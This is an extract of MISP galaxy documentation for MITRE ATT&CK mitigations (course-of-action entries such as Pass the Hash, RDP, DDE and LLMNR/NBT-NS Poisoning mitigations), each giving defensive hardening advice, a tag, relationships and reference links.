The tag is: misp-galaxy:mitre-course-of-action="Remote System Discovery Mitigation - T1018"

Remote System Discovery Mitigation - T1018 has relationships with:

Indirect Command Execution Mitigation - T1202

Identify or block potentially malicious software that may contain abusive functionality by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP). These mechanisms can also be used to disable and/or limit user access to Windows utilities and file types/locations used to invoke malicious execution.(Citation: SpectorOPs SettingContent-ms Jun 2018)

The tag is: `misp-galaxy:mitre-course-of-action="Indirect Command Execution Mitigation - T1202"`

Indirect Command Execution Mitigation - T1202 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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XSL Script Processing Mitigation - T1220

[Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and/or msxsl.exe may or may not be used within a given environment. Disabling WMI may cause system instability and should be evaluated to assess the impact to a network. If msxsl.exe is unnecessary, then block its execution to prevent abuse by adversaries.
The tag is: misp-galaxy:mitre-course-of-action="XSL Script Processing Mitigation - T1220"

XSL Script Processing Mitigation - T1220 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220" with estimative-language:likelihood-probability="almost-certain"

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**Standard Cryptographic Protocol Mitigation - T1032**

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Use of encryption protocols may make typical network-based C2 detection more difficult due to a reduced ability to signature the traffic. Prior knowledge of adversary C2 infrastructure may be useful for domain and IP address blocking, but will likely not be an effective long-term solution because adversaries can change infrastructure often. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Standard Cryptographic Protocol Mitigation - T1032"

Standard Cryptographic Protocol Mitigation - T1032 has relationships with:


Table 3941. Table References

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**Custom Cryptographic Protocol Mitigation - T1024**

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Since the custom protocol used may not adhere to typical protocol standards, there may be opportunities to signature the traffic on a network level for detection. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Custom Cryptographic Protocol Mitigation - T1024"

Custom Cryptographic Protocol Mitigation - T1024 has relationships with:
System Information Discovery Mitigation - T1082

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about the operating system and underlying hardware, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Information Discovery Mitigation - T1082"

System Information Discovery Mitigation - T1082 has relationships with:


Table 3943. Table References

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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Windows Remote Management Mitigation - T1028

Disable the WinRM service. If the service is necessary, lock down critical enclaves with separate WinRM infrastructure, accounts, and permissions. Follow WinRM best practices on configuration of authentication methods and use of host firewalls to restrict WinRM access to allow communication only to/from specific devices. (Citation: NSA Spotting)

The tag is: misp-galaxy:mitre-course-of-action="Windows Remote Management Mitigation - T1028"

Windows Remote Management Mitigation - T1028 has relationships with:
Commonly Used Port Mitigation - T1043

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: *misp-galaxy:mitre-course-of-action="Commonly Used Port Mitigation - T1043"

Commonly Used Port Mitigation - T1043 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

Security Software Discovery Mitigation - T1063

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about local security software, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: *misp-galaxy:mitre-course-of-action="Security Software Discovery Mitigation - T1063"

Security Software Discovery Mitigation - T1063 has relationships with:

Network Service Scanning Mitigation - T1046

Use network intrusion detection/prevention systems to detect and prevent remote service scans. Ensure that unnecessary ports and services are closed and proper network segmentation is followed to protect critical servers and devices.

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about services running on remote systems, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Network Service Scanning Mitigation - T1046"

Network Service Scanning Mitigation - T1046 has relationships with:


Table 3947. Table References

Links

https://attack.mitre.org/mitigations/T1046
http://www.sans.org/reading-room/whitewpapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
Application Isolation and Sandboxing - M1048

Restrict execution of code to a virtual environment on or in transit to an endpoint system.

The tag is: misp-galaxy:mitre-course-of-action="Application Isolation and Sandboxing - M1048"

Application Isolation and Sandboxing - M1048 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1173" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Component Object Model and Distributed COM - T1175" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Inter-Process Communication - T1559" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Escape to Host - T1611" with estimative-language:likelihood-probability="almost-certain"

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**Inhibit System Recovery Mitigation - T1490**

Consider technical controls to prevent the disabling of services or deletion of files involved in system recovery.

Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. (Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.

Identify potentially malicious software and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: `misp-galaxy:mitre-course-of-action="Inhibit System Recovery Mitigation - T1490"`

Inhibit System Recovery Mitigation - T1490 has relationships with:


**Table 3949. Table References**

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**Uncommonly Used Port Mitigation - T1065**

Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports.

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: `misp-galaxy:mitre-course-of-action="Uncommonly Used Port Mitigation - T1065"`
Uncommonly Used Port Mitigation - T1065 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"

Pass the Hash Mitigation - T1075

Monitor systems and domain logs for unusual credential logon activity. Prevent access to [Valid Accounts](https://attack.mitre.org/techniques/T1078). Apply patch KB2871997 to Windows 7 and higher systems to limit the default access of accounts in the local administrator group.

Enable pass the hash mitigations to apply UAC restrictions to local accounts on network logon. The associated Registry key is located through GPO: Computer Configuration > [Policies] > Administrative Templates > SCM: Pass the Hash Mitigations: Apply UAC restrictions to local accounts on network logons. (Citation: GitHub IAD Secure Host Baseline UAC Filtering)

Limit credential overlap across systems to prevent the damage of credential compromise and reduce the adversary's ability to perform Lateral Movement between systems. Ensure that built-in and created local administrator accounts have complex, unique passwords. Do not allow a domain user to be in the local administrator group on multiple systems.

The tag is: misp-galaxy:mitre-course-of-action="Pass the Hash Mitigation - T1075"

Pass the Hash Mitigation - T1075 has relationships with:


Remote Desktop Protocol Mitigation - T1076

Disable the RDP service if it is unnecessary, remove unnecessary accounts and groups from Remote Desktop Users groups, and enable firewall rules to block RDP traffic between network security zones. Audit the Remote Desktop Users group membership regularly. Remove the local
Administrators group from the list of groups allowed to log in through RDP. Limit remote user permissions if remote access is necessary. Use remote desktop gateways and multifactor authentication for remote logins. (Citation: Berkley Secure) Do not leave RDP accessible from the internet. Change GPOs to define shorter timeouts sessions and maximum amount of time any single session can be active. Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server. (Citation: Windows RDP Sessions)

The tag is: `misp-galaxy:mitre-course-of-action="Remote Desktop Protocol Mitigation - T1076"`

Remote Desktop Protocol Mitigation - T1076 has relationships with:


**Table 3952. Table References**

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<td><a href="https://security.berkeley.edu/node/94">https://security.berkeley.edu/node/94</a></td>
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**NTFS File Attributes Mitigation - T1096**

It may be difficult or inadvisable to block access to EA and ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Symantec ADS May 2009) Efforts should be focused on preventing potentially malicious software from running. Identify and block potentially malicious software that may contain functionality to hide information in EA and ADSs by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

Consider adjusting read and write permissions for NTFS EA, though this should be tested to ensure routine OS operations are not impeded. (Citation: InsiderThreat NTFS EA Oct 2017)

The tag is: `misp-galaxy:mitre-course-of-action="NTFS File Attributes Mitigation - T1096"`

NTFS File Attributes Mitigation - T1096 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1096"` with estimaive-language:likelihood-probability="almost-certain"

**Table 3953. Table References**

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</table>
Permission Groups Discovery Mitigation - T1069

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about groups and permissions, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Permission Groups Discovery Mitigation - T1069"

Permission Groups Discovery Mitigation - T1069 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"

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Windows Admin Shares Mitigation - T1077

Do not reuse local administrator account passwords across systems. Ensure password complexity and uniqueness such that the passwords cannot be cracked or guessed. Deny remote use of local admin credentials to log into systems. Do not allow domain user accounts to be in the local Administrators group multiple systems.

Identify unnecessary system utilities or potentially malicious software that may be used to leverage
SMB and the Windows admin shares, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Windows Admin Shares Mitigation - T1077"

Windows Admin Shares Mitigation - T1077 has relationships with:


**Table 3955. Table References**

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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**Pass the Ticket Mitigation - T1097**

Monitor domains for unusual credential logons. Limit credential overlap across systems to prevent the damage of credential compromise. Ensure that local administrator accounts have complex, unique passwords. Do not allow a user to be a local administrator for multiple systems. Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts. (Citation: ADSecurity AD Kerberos Attacks)

For containing the impact of a previously generated golden ticket, reset the built-in KRBTGT account password twice, which will invalidate any existing golden tickets that have been created with the KRBTGT hash and other Kerberos tickets derived from it. (Citation: CERT-EU Golden Ticket Protection)

Attempt to identify and block unknown or malicious software that could be used to obtain Kerberos tickets and use them to authenticate by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Pass the Ticket Mitigation - T1097"

Pass the Ticket Mitigation - T1097 has relationships with:

Disabling Security Tools Mitigation - T1089

Ensure proper process, registry, and file permissions are in place to prevent adversaries from disabling or interfering with security services.

The tag is: `misp-galaxy:mitre-course-of-action="Disabling Security Tools Mitigation - T1089"`

Disabling Security Tools Mitigation - T1089 has relationships with:


Space after Filename Mitigation - T1151

Prevent files from having a trailing space after the extension.

The tag is: `misp-galaxy:mitre-course-of-action="Space after Filename Mitigation - T1151"`

Space after Filename Mitigation - T1151 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Space after Filename - T1151"` with `estimative-language:likelihood-probability="almost-certain"`
Credentials in Registry Mitigation - T1214

Do not store credentials within the Registry. Proactively search for credentials within Registry keys and attempt to remediate the risk. If necessary software must store credentials, then ensure those accounts have limited permissions so they cannot be abused if obtained by an adversary.

The tag is: `misp-galaxy:mitre-course-of-action="Credentials in Registry Mitigation - T1214"`

Credentials in Registry Mitigation - T1214 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1214"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002"` with estimative-language:likelihood-probability="almost-certain"

Table 3959. Table References

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System Time Discovery Mitigation - T1124

Benign software uses legitimate processes to gather system time. Efforts should be focused on preventing unwanted or unknown code from executing on a system. Some common tools, such as net.exe, may be blocked by policy to prevent common ways of acquiring remote system time.

Identify unnecessary system utilities or potentially malicious software that may be used to acquire system time information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: `misp-galaxy:mitre-course-of-action="System Time Discovery Mitigation - T1124"`

System Time Discovery Mitigation - T1124 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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Browser Bookmark Discovery Mitigation - T1217

File system activity is a common part of an operating system, so it is unlikely that mitigation would be appropriate for this technique. For example, mitigating accesses to browser bookmark files will likely have unintended side effects such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior. It may still be beneficial to identify and block unnecessary system utilities or potentially malicious software by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Browser Bookmark Discovery Mitigation - T1217"

Browser Bookmark Discovery Mitigation - T1217 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Browser Bookmark Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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Netsh Helper DLL Mitigation - T1128

Identify and block potentially malicious software that may persist in this manner by using whitelisting (Citation: Beechey 2010) tools capable of monitoring DLL loads by Windows utilities like AppLocker. (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker)

The tag is: misp-galaxy:mitre-course-of-action="Netsh Helper DLL Mitigation - T1128"

Netsh Helper DLL Mitigation - T1128 has relationships with:
Remote Access Tools Mitigation - T1219

Properly configure firewalls, application firewalls, and proxies to limit outgoing traffic to sites and services used by remote access tools.

Network intrusion detection and prevention systems that use network signatures may be able to prevent traffic to these services as well.

Use application whitelisting to mitigate use of and installation of unapproved software.

The tag is: misp-galaxy:mitre-course-of-action="Remote Access Tools Mitigation - T1219"

Remote Access Tools Mitigation - T1219 has relationships with:


External Remote Services Mitigation - T1133

Limit access to remote services through centrally managed concentrators such as VPNs and other managed remote access systems. Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls. Disable or block remotely available services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1028). Use strong two-factor or multi-factor authentication for remote service accounts to mitigate an adversary's ability to leverage stolen credentials, but be aware of [Two-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111) techniques for some two-factor authentication implementations.

The tag is: misp-galaxy:mitre-course-of-action="External Remote Services Mitigation - T1133"
Access Token Manipulation Mitigation - T1134

Access tokens are an integral part of the security system within Windows and cannot be turned off. However, an attacker must already have administrator level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require to do their job.

Any user can also spoof access tokens if they have legitimate credentials. Follow mitigation guidelines for preventing adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Limit permissions so that users and user groups cannot create tokens. This setting should be defined for the local system account only. GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Create a token object. (Citation: Microsoft Create Token) Also define who can create a process level token to only the local and network service through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Replace a process level token. (Citation: Microsoft Replace Process Token)

Also limit opportunities for adversaries to increase privileges by limiting Privilege Escalation opportunities.

The tag is: `misp-galaxy:mitre-course-of-action="Access Token Manipulation Mitigation - T1134"`

Access Token Manipulation Mitigation - T1134 has relationships with:


Network Share Discovery Mitigation - T1135

Identify unnecessary system utilities or potentially malicious software that may be used to acquire...
network share information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Network Share Discovery Mitigation - T1135"

Network Share Discovery Mitigation - T1135 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

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**Dynamic Data Exchange Mitigation - T1173**

Registry keys specific to Microsoft Office feature control security can be set to disable automatic DDE/OLE execution. (Citation: Microsoft DDE Advisory Nov 2017) (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: GitHub Disable DDEAUTO Oct 2017) Microsoft also created, and enabled by default, Registry keys to completely disable DDE execution in Word and Excel. (Citation: Microsoft ADV170021 Dec 2017)

Ensure Protected View is enabled (Citation: Microsoft Protected View) and consider disabling embedded files in Office programs, such as OneNote, not enrolled in Protected View. (Citation: Enigma Reviving DDE Jan 2018) (Citation: GitHub Disable DDEAUTO Oct 2017)

On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent DDE attacks and spawning of child processes from Office programs. (Citation: Microsoft ASR Nov 2017) (Citation: Enigma Reviving DDE Jan 2018)

The tag is: misp-galaxy:mitre-course-of-action="Dynamic Data Exchange Mitigation - T1173"

Dynamic Data Exchange Mitigation - T1173 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1173" with estimative-language:likelihood-probability="almost-certain"

Table 3967. Table References
Clear Command History Mitigation - T1146

Preventing users from deleting or writing to certain files can stop adversaries from maliciously altering their ~/.bash_history files. Additionally, making these environment variables readonly can make sure that the history is preserved (Citation: Securing bash history).

The tag is: misp-galaxy:mitre-course-of-action="Clear Command History Mitigation - T1146"

Clear Command History Mitigation - T1146 has relationships with:


Password Filter DLL Mitigation - T1174

Ensure only valid password filters are registered. Filter DLLs must be present in Windows installation directory (<code>C:\Windows\System32</code> by default) of a domain controller and/or local computer with a corresponding entry in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>. (Citation: Microsoft Install Password Filter n.d)

The tag is: misp-galaxy:mitre-course-of-action="Password Filter DLL Mitigation - T1174"
Password Filter DLL Mitigation - T1174 has relationships with:


Table 3969. Table References

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Spearphishing via Service Mitigation - T1194

Determine if certain social media sites, personal webmail services, or other service that can be used for spearphishing is necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.

Because this technique involves use of legitimate services and user interaction on the endpoint, it's difficult to fully mitigate. However, there are potential mitigations. Users can be trained to identify social engineering techniques and spearphishing emails with malicious links. To prevent the downloads from executing, application whitelisting can be used. Anti-virus can also automatically quarantine suspicious files.

The tag is: misp-galaxy:mitre-course-of-action="Spearphishing via Service Mitigation - T1194"

Spearphishing via Service Mitigation - T1194 has relationships with:


Table 3970. Table References

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Supply Chain Compromise Mitigation - T1195

Apply supply chain risk management (SCRM) practices and procedures (Citation: MITRE SE Guide 2014), such as supply chain analysis and appropriate risk management, throughout the life-cycle of a system.

Leverage established software development lifecycle (SDLC) practices (Citation: NIST Supply Chain 2012):

- Uniquely Identify Supply Chain Elements, Processes, and Actors
- Limit Access and Exposure within the Supply Chain
- Establish and Maintain the Provenance of Elements, Processes, Tools, and Data
- Share Information within Strict Limits
- Perform SCRM Awareness and Training
- Use Defensive Design for Systems, Elements, and Processes
- Perform Continuous Integrator Review
- Strengthen Delivery Mechanisms
- Assure Sustainment Activities and Processes
- Manage Disposal and Final Disposition Activities throughout the System or Element Life Cycle

A patch management process should be implemented to check unused dependencies, unmaintained and/or previously vulnerable dependencies, unnecessary features, components, files, and documentation. Continuous monitoring of vulnerability sources and the use of automatic and manual code review tools should also be implemented as well. (Citation: OWASP Top 10 2017)

The tag is: `misp-galaxy:mitre-course-of-action="Supply Chain Compromise Mitigation - T1195"`

Supply Chain Compromise Mitigation - T1195 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1195"` with `estimative-language:likelihood-probability="almost-certain"`

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<td><a href="http://dx.doi.org/10.6028/NIST.IR.7622">http://dx.doi.org/10.6028/NIST.IR.7622</a></td>
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**Setuid and Setgid Mitigation - T1166**

Applications with known vulnerabilities or known shell escapes should not have the setuid or setgid bits set to reduce potential damage if an application is compromised. Additionally, the number of programs with setuid or setgid bits set should be minimized across a system.

The tag is: `misp-galaxy:mitre-course-of-action="Setuid and Setgid Mitigation - T1166"`

Setuid and Setgid Mitigation - T1166 has relationships with:


Table 3972. Table References

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Local Job Scheduling Mitigation - T1168

Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized users can create scheduled jobs. Identify and block unnecessary system utilities or potentially malicious software that may be used to schedule jobs using whitelisting tools.

The tag is: misp-galaxy:mitre-course-of-action="Local Job Scheduling Mitigation - T1168"

Local Job Scheduling Mitigation - T1168 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Local Job Scheduling - T1168" with estimative-language:likelihood-probability="almost-certain"

Control Panel Items Mitigation - T1196

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific Windows API calls and/or execution of particular file extensions will likely have unintended side effects, such as preventing legitimate software (i.e., drivers and configuration tools) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior.

Restrict storage and execution of Control Panel items to protected directories, such as `<code>C:\Windows</code>`, rather than user directories.

Index known safe Control Panel items and block potentially malicious software using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown executable files.

Consider fully enabling User Account Control (UAC) to impede system-wide changes from illegitimate administrators. (Citation: Microsoft UAC)

The tag is: misp-galaxy:mitre-course-of-action="Control Panel Items Mitigation - T1196"

Control Panel Items Mitigation - T1196 has relationships with:

Compiled HTML File Mitigation - T1223

Consider blocking download/transfer and execution of potentially uncommon file types known to be used in adversary campaigns, such as CHM files. (Citation: PaloAlto Preventing Opportunistic Attacks Apr 2016) Also consider using application whitelisting to prevent execution of hh.exe if it is not required for a given system or network to prevent potential misuse by adversaries.

The tag is: *misp-galaxy:mitre-course-of-action="Compiled HTML File Mitigation - T1223"

Compiled HTML File Mitigation - T1223 has relationships with:

- mitigates: *misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1223" with estimative-language:likelihood-probability="almost-certain"

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Domain Trust Discovery Mitigation - T1482

Map the trusts within existing domains/forests and keep trust relationships to a minimum. Employ network segmentation for sensitive domains.(Citation: Harmj0y Domain Trusts)

The tag is: *misp-galaxy:mitre-course-of-action="Domain Trust Discovery Mitigation - T1482"

Domain Trust Discovery Mitigation - T1482 has relationships with:

- mitigates: *misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

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Stored Data Manipulation Mitigation - T1492

Identify critical business and system processes that may be targeted by adversaries and work to secure the data related to those processes against tampering. Ensure least privilege principles are applied to important information resources to reduce exposure to data manipulation risk. Consider encrypting important information to reduce an adversaries ability to perform tailor data modifications. Where applicable, examine using file monitoring software to check integrity on important files and directories as well as take corrective actions when unauthorized changes are detected.

Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and manipulate backups.

The tag is: misp-galaxy:mitre-course-of-action="Stored Data Manipulation Mitigation - T1492"

Stored Data Manipulation Mitigation - T1492 has relationships with:


Table 3977. Table References

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<td><a href="https://www.ready.gov/business/implementation/IT">https://www.ready.gov/business/implementation/IT</a></td>
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Domain Generation Algorithms Mitigation - T1483

This technique may be difficult to mitigate since the domains can be registered just before they are used, and disposed shortly after. Malware researchers can reverse-engineer malware variants that use DGAs and determine future domains that the malware will attempt to contact, but this is a time and resource intensive effort.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA Brute Force) Malware is also increasingly incorporating seed values that can be unique for each instance, which would then need to be determined to extract future generated domains. In some cases, the seed that a particular sample uses can be extracted from DNS traffic.(Citation: Akamai DGA Mitigation) Even so, there can be thousands of possible domains generated per day; this makes it impractical for defenders to preemptively register all possible C2 domains due to the cost. In some cases a local DNS sinkhole may be used to help prevent DGA-based command and control at a reduced cost.

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)
Domain Generation Algorithms Mitigation - T1483 has relationships with:


Table 3978. Table References

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<td><a href="https://umbrella.cisco.com/blog/2015/02/18/at-high-noon-algorithms-do-battle/">https://umbrella.cisco.com/blog/2015/02/18/at-high-noon-algorithms-do-battle/</a></td>
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Transmitted Data Manipulation Mitigation - T1493

Identify critical business and system processes that may be targeted by adversaries and work to secure communications related to those processes against tampering. Encrypt all important data flows to reduce the impact of tailored modifications on data in transit.

The tag is: misp-galaxy:mitre-course-of-action="Transmitted Data Manipulation Mitigation - T1493"

Transmitted Data Manipulation Mitigation - T1493 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1493" with estimative-language:likelihood-probability="almost-certain"

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Runtime Data Manipulation Mitigation - T1494

Identify critical business and system processes that may be targeted by adversaries and work to secure those systems against tampering. Prevent critical business and system processes from being replaced, overwritten, or reconfigured to load potentially malicious code. Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Runtime Data Manipulation Mitigation - T1494"
Runtime Data Manipulation Mitigation - T1494 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1494" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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LLMNR/NBT-NS Poisoning Mitigation - T1171

Disable LLMNR and NetBIOS in local computer security settings or by group policy if they are not needed within an environment. (Citation: ADSecurity Windows Secure Baseline)

Use host-based security software to block LLMNR/NetBIOS traffic. Enabling SMB Signing can stop NTLMv2 relay attacks.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)(Citation: Microsoft SMB Packet Signing)

The tag is: misp-galaxy:mitre-course-of-action="LLMNR/NBT-NS Poisoning Mitigation - T1171"

